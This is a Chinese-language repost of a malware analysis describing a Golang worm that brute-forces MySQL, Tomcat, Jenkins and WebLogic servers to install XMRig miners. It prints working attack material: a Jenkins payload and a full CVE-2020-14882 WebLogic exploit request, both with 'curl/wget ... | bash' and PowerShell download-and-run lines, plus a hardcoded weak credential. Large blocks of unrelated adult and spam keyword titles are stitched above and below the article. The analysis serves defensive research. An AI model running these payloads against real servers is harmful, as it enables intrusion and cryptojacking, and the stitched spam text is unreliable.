精品欧美一区二区三区在线观看 _久久久久国色av免费观看性色_国产精品久久在线观看_亚洲第一综合网站_91精品又粗又猛又爽_小泽玛利亚一区二区免费_91亚洲精品国偷拍自产在线观看 _久久精品视频在线播放_美女精品久久久_欧美日韩国产成人在线

Golang蠕蟲將Windows和Linux服務器變成門羅幣挖礦機

安全
使用Golang語言開發多平臺惡意軟件是2020年惡意軟件的發展趨勢。

[[374355]]

使用Golang語言開發多平臺惡意軟件是2020年惡意軟件的發展趨勢。2020年12月初,研究人員發現了一個新的用Golang語言編寫的蠕蟲。該蠕蟲嘗試在網絡中傳播來大規模地運行XMRig挖礦機。惡意軟件的目標是Windows和Linux服務器。在老版本中,該蠕蟲嘗試利用WebLogic的漏洞——CVE-2020-14882。

研究人員分析發現,攻擊者持續更新C2服務器上的蠕蟲,表明惡意軟件開發者非常活躍,而且在未來的更新中可能會攻擊其他弱配置的服務。

技術分析

攻擊者使用了3個文件:

· 釋放器腳本(bash或powershell);

· Golang二進制蠕蟲;

· XMRig 挖礦機。

這3個文件都位于同一C2服務器上。

截止目前,ELF 蠕蟲二進制文件和bash 釋放器腳本在VirusTotal 中都沒有檢測到。圖1是VirusTotal 對ELF 蠕蟲二進制文件的檢測結果。


圖 1: VirusTotal 對ELF 蠕蟲二進制文件的檢測結果

惡意軟件在Windows和Linux操作系統上的行為非常相似。下面對Linux蠕蟲的工作流進行分析。

Linux蠕蟲工作流

蠕蟲執行后會檢查受感染的機器上是否有進程在監聽52013端口。端口監聽器的存在是一個mutex互斥量。如果端口的socket已經開放,惡意軟件實例就會退出,否則就會打開一個端口的網絡socket。

在老版本中,蠕蟲會解壓XMRig 挖礦機為Network01到tmp文件夾中,并運行。挖礦機會使用Go資源嵌入包(go-bindata)嵌入到Golang二進制文件中,惡意軟件會使用bindataFile來解壓嵌入的XMRig 挖礦機。圖2是文件中的函數:


圖 2: xmrig_linux_amd64.go文件

惡意軟件會使用TCP SYN掃描網絡來找到可以暴力破解的服務,并在網絡中傳播。然后掃描有與這些服務相關的開放端口的IP,Tomcat 和 Jenkins的端口是8080,MySQL的端口是3306,WebLogic的端口是7001。這些漏洞利用中在src exp代碼下有一個包。


圖 3: “exp”包文件和函數

蠕蟲使用gopacket庫來提供Go語言的C綁定,用libpcap來讀取網絡包。通過運行pcapc,蠕蟲會收集網絡數據并繼續對服務進行暴力破解。圖4是蠕蟲暴力破解和嘗試在Tomcat和MySQL服務上進行漏洞利用的結果。


圖 4: 蠕蟲結果片段

漏洞利用后,惡意軟件會傳播一個加載器腳本:Linux系統是ld.sh,Windows平臺是ld.ps1。加載器負責釋放和運行XMRig挖礦機和Golang 蠕蟲。圖5和圖6是加載器腳本。


圖 5: ldr.sh –Linux平臺的釋放器bash腳本


圖 6: ldr.ps1 script – Windows平臺的釋放器 powershell腳本

漏洞利用流

下面描述每個服務的攻擊流:

MySql: Port 3306

惡意軟件會運行憑證暴力破解攻擊。惡意軟件會使用硬編碼的弱憑證目錄,比如root:123456。

成功登陸后,惡意軟件會使用mysql UDF運行shellcode來獲取本地權限提升。漏洞利用以十六進制字符串的形式嵌入在二進制文件中。蠕蟲對不同的操作系統和架構有不同的漏洞利用,設計的系統和架構有UDFLINUX32、UDFLINUX64、UDFLWIN32和UDFWIN64。

運行漏洞利用后,payload會用sys_exec 命令來釋放和運行加載器腳本。URLWIN 和URLLINUX 保存釋放器腳本URL。圖7和圖8是每個操作系統對應的payload。


圖 7: MySQL查詢– Linux payload


圖 8: MySQL 查詢– Windows payload

Tomcat: Port 8080

惡意軟件會使用基本認證在管理員面板上運行憑證填充。


圖 9: 到Tomcat管理員面板的認證請求示例

成功嘗試后,惡意軟件會嘗試部署一個WAR文件,用來傳輸含有惡意payload的1.jsp 文件。

惡意軟件會發送Get請求,并分析jsp文件 %s/1.jsp?win=%s&linux=%s 的參數。這些參數中含有釋放器腳本URL。然后,JSP腳本會釋放和運行其加載器。


圖 10: 1.jsp文件腳本

Jenkins: Port 8080

與之前漏洞利用類似,惡意軟件會用口令填充來暴力破解Jenkins 登陸,并運行以下payload:

  1. cmd@/c@powershell iex(New-Object Net.WebClient).DownloadString(‘%s’)!bash@-c@(curl -fsSL %s || wget -q -O – %s) | bash 
  2. println “%s”+”%s”;def s=new String(Base64.getDecoder().decode(“%s”+”%s”.reverse())).split(“!”);def c=System.getProperty(“os.name”).contains(“indo”)?s[0].split(“@”):s[1].split(“@”);c.execute() 
  3. WebLogic: Port 7001 

 在之前版本中,惡意軟件會用最新的WebLogic 遠程代碼執行漏洞利用CVE-2020-14882。惡意軟件會發送到WebLogic服務的get請求,并使用GET請求header 作為payload的一部分。

  1. GET 
  2. /console/css/%%25%%32%%65%%25%%32%%65%%25%%32%%66consolejndi.portal?test_handle=com.tangosol.coherence.mvel2.sh.ShellSession(‘weblogic.work.ExecuteThread 
  3. %%20currentThread(weblogic.work.ExecuteThread)Thread.currentThread();weblogic.work
  4. WorkAdapter%%20adapter=currentThread.getCurrentWork();java.lang.reflect.Field%%20 
  5. field=adapter.getClass().getDeclaredField(“connectionHandler”);field.setAccessible 
  6. (true);Object%%20obj=field.get(adapter);weblogic.servlet.internal.ServletRequestI 
  7. mpl%%20req(weblogic.servlet.internal.ServletRequestImpl)obj.getClass().getMethod 
  8. (“getServletRequest”).invoke(obj);String%%20cmd=req.getHeader(“cmd”);String[]%% 
  9. 20cmds=System.getProperty(“os.name”).toLowerCase().contains(“win”)?new%%20String[]{“cmd.exe”,”/c”,req.getHeader(“win”)}:new%%20String[]{“/bin/sh”,”c”,req.getHeader 
  10. (“linux”)};if(cmd!=null{String%%20result=new%%20java.util.Scanner(new%%20java.lang 
  11. .ProcessBuilder(cmds).start().getInputStream()).useDelimiter(“%%5C%%5CA”).next(); 
  12. weblogic.servlet.internal.ServletResponseImpl%%20res(weblogic.servlet.internal. 
  13. ServletResponseImpl)req.getClass().getMethod(“getResponse”).invoke(req);work
  14. getServletOutputStream().writeStream(new%%20weblogic.xml.util.StringInputStream 
  15. (result));work.getServletOutputStream().flush 
  16. ();}currentThread.interrupt();’) HTTP/1.0 
  17. Host: %s:%d 
  18. User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.16; rv:82.0) Gecko/20100101 Firefox/82.0 
  19. Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 
  20. Connectionclose 
  21. cmd: ls 
  22. linux: ( (curl -fsSL %s || wget -q -O – %s) | bash& ) 
  23. win: start powershell iex(New-Object Net.WebClient).DownloadString(‘%s’) 

 總結

在2020年,研究人員發現許多攻擊不同平臺的Golang惡意軟件,包括Windows、Linux、Mac和安卓。研究人員認為這一趨勢在2021年將會繼續。此外,蠕蟲的PE和ELF版本代碼幾乎完全相同。

本文翻譯自:https://www.intezer.com/blog/research/new-golang-worm-drops-xmrig-miner-on-servers/如若轉載,請注明原文地址。

 

責任編輯:姜華 來源: 嘶吼網
相關推薦

2021-01-03 17:11:42

WindowsLinux蠕蟲

2021-01-04 13:23:56

僵尸網絡加密貨幣漏洞

2021-04-26 23:27:41

僵尸網絡漏洞惡意代碼

2025-07-18 13:17:23

2021-12-23 14:05:31

態勢感知/挖礦木馬

2021-08-10 10:37:43

惡意軟件挖礦網絡攻擊

2025-06-23 09:58:52

2021-04-27 19:23:47

服務器工具redis

2021-01-04 08:23:24

蠕蟲惡意軟件雙因素認證

2022-04-24 14:11:26

病毒僵尸網絡網絡攻擊

2018-08-29 08:43:11

2009-08-20 16:48:17

路由器LINUXLINUX內核

2010-03-26 18:36:53

惡意程序病毒卡巴斯基

2009-12-16 16:48:35

Linux操作系統

2012-09-20 09:17:18

LinuxWindows

2012-09-20 15:54:46

LinuxWindows服務器

2020-05-25 07:00:58

Raspberry PWeb服務器

2010-10-25 14:10:14

Linux無線網卡

2015-06-25 09:13:44

2020-07-16 11:51:37

漏洞WindowsDNS服務器
點贊
收藏

51CTO技術棧公眾號

天堂√8在线中文| 99视频国产精品免费观看a| 欧美日一区二区| 欧美精品在线一区二区| 亚洲中文字幕无码一区二区三区| 色在线免费视频| 美国毛片一区二区| 国内精品久久久久久中文字幕| 日本黄色网址大全| 成人污污视频| 色综合久久88色综合天天6| youjizz.com亚洲| 婷婷在线免费视频| 久久草av在线| 欧美亚洲成人xxx| 丰满少妇被猛烈进入一区二区| 宅男在线一区| 欧美精品一区二区三区蜜臀 | 91破解版在线观看| 国产拍揄自揄精品视频麻豆| 国产成人成网站在线播放青青 | 久久先锋影音| 久久久亚洲影院| 永久免费看片直接| 国产一区二区三区网| 精品国产髙清在线看国产毛片| 日本免费观看网站| 日韩影院在线| 亚洲一区二区三区精品在线| 一本久道久久综合| 九色视频在线观看免费播放 | 好看的日韩精品| 99热这里只有精品3| 久久国产精品99精品国产| 欧洲精品在线视频| 久草手机在线观看| 在线成人亚洲| 国产综合在线看| 欧美精品99久久久| 最新精品国产| 久久成人亚洲精品| 国产免费久久久久| 亚洲九九在线| 久久伊人免费视频| 人妻人人澡人人添人人爽| 人人狠狠综合久久亚洲婷| 亚洲久久久久久久久久| 给我免费观看片在线电影的| 福利欧美精品在线| 欧美精品一区二区久久婷婷 | 国产精品毛片一区二区在线看舒淇| 石原莉奈一区二区三区在线观看 | 精品久久久久久一区二区里番| 中文字幕一区二区三区免费看| 亚洲高清二区| 97av在线影院| 日本在线小视频| 一区精品久久| 国产做受69高潮| 国产一级片久久| 欧美天堂亚洲电影院在线观看| 久久精品亚洲精品| 肉色超薄丝袜脚交69xx图片| 国产乱码精品一区二区亚洲 | av电影在线播放高清免费观看| 91色乱码一区二区三区| 精品在线视频一区二区| 噜噜噜久久,亚洲精品国产品| 国模无码大尺度一区二区三区| 国产一区二区色| 中文字幕人妻色偷偷久久| 日本sm残虐另类| 国产精品午夜一区二区欲梦| 怡红院男人的天堂| 蜜臀av性久久久久蜜臀av麻豆 | 成人免费看片98欧美| 精品成人一区| 91黑丝在线观看| 99久久精品国产亚洲| 久久亚洲风情| 2019中文字幕在线免费观看| 国产精品美女久久久久av爽| 国产情侣一区| 亚州精品天堂中文字幕| 精品欧美一区二区三区免费观看 | 男女视频在线观看网站| 久久精品97| 91精品国模一区二区三区| 日本一二三四区视频| 亚洲3区在线| 日韩美女一区二区三区| 国产精品久久久久久亚洲av| 亚洲电影一级片| 最新亚洲国产精品| 欧美日韩三级在线观看| 亚洲免费中文| 国产精品第七十二页| 国产精品无码在线播放| 国产成a人无v码亚洲福利| 久久久久久久久久码影片| 国产成人天天5g影院在线观看| 国产精品剧情在线亚洲| 国产日韩亚洲欧美在线| 丝袜老师在线| 在线不卡欧美精品一区二区三区| 色悠悠在线视频| 久久不见久久见国语| 日韩亚洲精品视频| 欧美精品亚洲精品日韩精品| 噜噜噜91成人网| 波多野结衣成人在线| 欧美精品久久久久久久久久丰满| 中文字幕一区二区三区不卡在线| 天堂8在线天堂资源bt| 忘忧草在线www成人影院| 日韩一区二区在线免费观看| 女尊高h男高潮呻吟| 色婷婷亚洲mv天堂mv在影片| 午夜欧美不卡精品aaaaa| 中文字幕精品一区二区精| 成人午夜免费电影| 日韩尤物视频| 欧美电影免费观看| 欧美成人a∨高清免费观看| www色com| 国产精品毛片| 99在线观看视频| 国产视频在线看| 亚洲电影中文字幕在线观看| 婷婷激情四射五月天| 国产另类在线| 色婷婷**av毛片一区| 亚洲欧美日韩一区二区三区四区| 成人黄色在线看| 伊人久久大香线蕉午夜av| 亚洲国产欧美日本视频| 日韩精品专区在线影院观看| 激情高潮到大叫狂喷水| 国产精品社区| 国产精品一区二区三区观看| 米奇精品一区二区三区| 色哟哟日韩精品| 久久精品老司机| 亚洲激情视频| 亚洲xxxxx电影| 亚洲图片88| 欧洲精品视频在线观看| 亚洲av无码一区二区二三区| 国产精品观看| 91免费在线视频网站| p色视频免费在线观看| 精品国产91久久久久久| 国产农村妇女精品久久| 久久久国产精品| 日本精品久久久久久久| 欧美日韩国产中文字幕在线| 午夜精品福利久久久| 亚洲一区和二区| 女人色偷偷aa久久天堂| 91人人爽人人爽人人精88v| 欧美激情办公室videoshd| 欧美日韩亚洲综合一区| 国产三级短视频| 九色综合狠狠综合久久| 2021狠狠干| 警花av一区二区三区| 久久99久久99精品免观看粉嫩| 一级黄色片免费| 综合av第一页| 美女被爆操网站| 亚洲日韩视频| 欧美日韩高清在线一区| 久久av影院| 久久天天躁狠狠躁老女人| 国产sm主人调教女m视频| 亚洲嫩草精品久久| 亚洲成年人在线观看| 好看的亚洲午夜视频在线| 国产一区二区高清不卡| 中文字幕资源网在线观看免费| 亚洲视频视频在线| 青娱乐在线免费视频| 国产精品麻豆一区二区| 一级网站在线观看| 1024日韩| 日韩久久不卡| 国产成人精选| 日韩一区二区精品视频| 国产草草影院ccyycom| 亚洲地区一二三色| 日本xxxxxxxxx18| 麻豆91小视频| 一区二区在线高清视频| 久久悠悠精品综合网| 国产99久久久欧美黑人| 好操啊在线观看免费视频| 日韩午夜av一区| 中日韩黄色大片| 中文字幕成人网| 精品国产免费久久久久久婷婷| 亚洲精品美女91| 日韩欧美电影一区二区| 福利电影一区| 国产日韩视频在线观看| 国产白丝在线观看| 国产亚洲综合久久| www.com欧美| 在线观看亚洲精品视频| 久久高清无码视频| 国产女人水真多18毛片18精品视频| 性生生活大片免费看视频| 国产精品vip| 五月天国产一区| 久久精品66| 91理论片午午论夜理片久久| 性欧美freesex顶级少妇| 久久精品国产2020观看福利| 日韩三级电影网| 欧美午夜精品一区| 无码人妻av一区二区三区波多野 | 亚洲精品乱码久久久久久金桔影视 | 北条麻妃亚洲一区| 久热re这里精品视频在线6| 特级西西人体www高清大胆| 欧美女优在线视频| 国产成人女人毛片视频在线| 亚洲爽爆av| 2020欧美日韩在线视频| а√天堂资源官网在线资源| 久久精品91久久香蕉加勒比| 男人天堂网在线| 精品国精品国产| 国产免费av电影| 欧美三级视频在线播放| 人妻 日韩精品 中文字幕| 亚洲狠狠爱一区二区三区| 一区二区视频免费看| 欧美国产成人精品| 日本xxxxxxxxx18| 91在线小视频| 2一3sex性hd| 国产成人无遮挡在线视频| 午夜一级免费视频| 久久99九九99精品| 黄色片免费网址| 激情都市一区二区| www.久久av.com| 久久成人免费网站| 性生生活大片免费看视频| 免费精品视频在线| 青青在线免费观看视频| 亚洲国产日本| 色综合av综合无码综合网站| 亚洲精品在线二区| av免费看网址| 欧美另类亚洲| 香港三级日本三级a视频| 欧美va天堂在线| 麻豆md0077饥渴少妇| 欧美日韩一区自拍 | 久久久久久国产精品免费无遮挡 | 欧美xxx黑人xxx水蜜桃| 欧美日本精品在线| 日本大胆在线观看| 九九久久久久久久久激情| 在线中文字幕电影| 欧美精品生活片| 日本高清视频在线播放| 欧美日韩国产成人在线| 黄污视频在线观看| 午夜精品久久久久久99热| 欧美aa免费在线| 5566成人精品视频免费| 亚洲天堂手机| 国产精品成人v| 91精品国产一区二区在线观看 | 亚洲国产精品无码久久久| 色哟哟国产精品| 亚洲一区二区激情| 91精品欧美久久久久久动漫 | 国产精品第56页| 福利微拍一区二区| 在线免费观看av网址| 日韩三级免费观看| 神马午夜电影一区二区三区在线观看| 亚洲女成人图区| 秋霞午夜理伦电影在线观看| 久久99久国产精品黄毛片入口| 九色porny自拍视频在线播放| 国产成人一区二区三区电影| 8av国产精品爽爽ⅴa在线观看 | 午夜视频在线瓜伦| 国内一区二区视频| 老熟妇精品一区二区三区| 97久久超碰国产精品电影| 国产伦理片在线观看| 亚洲欧美乱综合| 国产精品一区二区6| 欧美性三三影院| 亚洲av少妇一区二区在线观看| 亚洲精品日韩欧美| 看女生喷水的网站在线观看| 欧美刺激性大交免费视频| 粉嫩一区二区| 91在线视频精品| 午夜欧洲一区| 日韩video| 日欧美一区二区| 日本精品一二三| 国产视频视频一区| 日韩福利片在线观看| 在线成人午夜影院| 看电影就来5566av视频在线播放| 久久伊人免费视频| 欧美日韩123区| www日韩av| 日韩在线看片| 不卡av免费在线| 国产成人99久久亚洲综合精品| 亚洲av无码国产精品麻豆天美| 亚洲综合清纯丝袜自拍| 一级黄色短视频| 亚洲天堂av在线免费| 好看的中文字幕在线播放| 国产精品久久久久久久久免费看 | 日韩一级在线| 国产一级免费大片| 国产无人区一区二区三区| xxxx 国产| 日韩亚洲欧美成人一区| 超碰在线国产| 日韩av免费网站| 欧美精品中文| 草b视频在线观看| 国产一区二区精品久久| 综合 欧美 亚洲日本| 日本久久一区二区三区| 天堂国产一区二区三区| 久久久久久中文字幕| 视频一区在线| 韩国黄色一级大片| 狠狠色丁香久久婷婷综| 国产午夜精品福利视频| 在线免费av一区| 无码国精品一区二区免费蜜桃| 久久久久久国产精品久久| 韩国三级成人在线| 中文字幕精品—区二区日日骚| 石原莉奈在线亚洲二区| 日韩av一二区| 疯狂做受xxxx欧美肥白少妇| 成人久久久精品国产乱码一区二区 | 精品国产成人av在线免| 99精品热视频| 欧美日韩一二三四区| 精品久久国产字幕高潮| 亚洲少妇视频| 欧洲亚洲一区二区三区四区五区| 乱码第一页成人| 男人舔女人下部高潮全视频| 91成人在线精品| 18免费在线视频| 成人免费看片视频| 欧美1区2区3区| 日本泡妞xxxx免费视频软件| 亚洲精品美腿丝袜| 亚洲大尺度网站| 国产成人一区二区三区| 成人久久综合| 在线观看免费不卡av| 亚洲色图欧洲色图| 精品国产av鲁一鲁一区| 欧美国产精品va在线观看| 亚洲都市激情| 国产一线二线三线在线观看| 中文字幕va一区二区三区| 一区二区 亚洲| 欧美大片免费看| 成人精品毛片| 国产又猛又黄的视频| 亚洲色图欧美偷拍| 欧美性受xxxx狂喷水| 91a在线视频| 欧美亚洲高清| 成年人三级黄色片| 午夜日韩在线电影| 大乳在线免费观看| 91在线免费看网站| 亚洲美洲欧洲综合国产一区| 一区二区三区四区免费| 欧美日韩国产电影| 小视频免费在线观看| 亚洲欧美精品在线观看| 成人综合婷婷国产精品久久免费| 国产欧美一区二区三区在线看蜜臂| 亚洲人成毛片在线播放| 51亚洲精品| 黄色片在线免费| 亚洲免费在线播放| 日色在线视频|